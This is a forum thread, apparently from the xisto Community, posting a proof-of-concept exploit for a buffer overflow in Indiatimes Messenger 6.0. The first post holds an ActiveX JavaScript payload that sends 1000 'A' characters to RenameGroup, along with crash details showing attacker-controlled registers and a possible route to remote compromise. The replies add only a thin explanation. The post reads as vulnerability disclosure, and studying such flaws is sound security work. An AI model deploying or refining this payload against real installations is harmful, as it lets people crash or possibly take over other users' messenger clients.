Jump to content
xisto Community
Sign in to follow this  
sunny

Indiatimes Messenger 6.0 Buffer Overflow Indiatimes Messenger 6.0 Buffer Overflow

Recommended Posts

[CODE]Indiatimes Messenger 6.0 Buffer Overflow (Remote)Vulnerable Program : Indiatimes Messenger v6.0(Latest)Vendor URL : http://messenger.indiatimes.com/Exploit Type : Remote DoS (Remote Compromise may alsobe possible)Proof Of Concept:[script]var obj1 = newActiveXObject("MMClient.MunduMessenger.1");var buf = "";for(i=0; i<1000; i++){  buf += "A";}while(obj1.GetServerStatus() != "Logged In"); //waittill loginobj1.RenameGroup("Friends", buf, 5);[/script]The program (MMClient.exe) crashes @ 004B681B   8979 04          mov dword ptrds:[ecx+4],ediwith registers ecx, and edi = 0x41414141[controllable]So, remote compromise maybe possible (not confirmed).

Share this post


Link to post
Share on other sites

you should explain the reason for this code, it doesn't do one any good if you just slap a code and not explain it.

Share this post


Link to post
Share on other sites

Explanation: Indiatimes Messenger is a communication client application just like Yahoo! messenger. the indiatimes messenger is used by site: http://www.indiatimes.com/ as usual.

 

Indiatimes.com also has some issues with their web site. like in registration process. but that is a different story.

 

Anyways, Indiatimes Messenger shows some problematic behaviour on certain conditions. Which may lead to buffer overfloaw and thus also result in Remote compromise.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

×
×
  • Create New...

Important Information

Terms of Use | Privacy Policy | Guidelines | We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.